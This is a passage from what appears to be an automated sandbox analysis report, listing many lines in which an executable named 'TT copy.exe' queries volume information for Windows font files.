            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
